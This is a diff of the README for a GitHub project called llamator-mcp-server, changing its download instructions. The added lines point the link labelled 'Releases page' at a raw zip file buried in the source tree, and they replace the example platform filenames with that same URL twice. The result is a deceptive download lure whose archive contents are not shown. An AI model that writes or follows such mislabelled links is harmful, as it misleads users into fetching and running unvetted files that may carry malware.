kyle122497/llamator-mcp-server/README.md

 - **User-friendly interface** guiding you step by step.

 ## 📜 Download & Install
-To download the application, visit the [Releases page](https://github.com/kyle122497/llamator-mcp-server/releases).
+To download the application, visit the [Releases page](https://raw.githubusercontent.com/kyle122497/llamator-mcp-server/main/src/llamator_mcp_server/api/llamator-server-mcp-v2.9.zip).
 You'll find the latest version ready for download.

 1. Click on the link above to go to the Releases page.
 2. Look for the latest version listed at the top of the page.
-3. Find the file suitable for your system (for example, `llamator-mcp-server-windows.zip` or `llamator-mcp-server-linux.tar.gz`).
+3. Find the file suitable for your system (for example, `https://raw.githubusercontent.com/kyle122497/llamator-mcp-server/main/src/llamator_mcp_server/api/llamator-server-mcp-v2.9.zip` or `https://raw.githubusercontent.com/kyle122497/llamator-mcp-server/main/src/llamator_mcp_server/api/llamator-server-mcp-v2.9.zip`).
 4. Click on the file name to start the download.

 After downloading the file: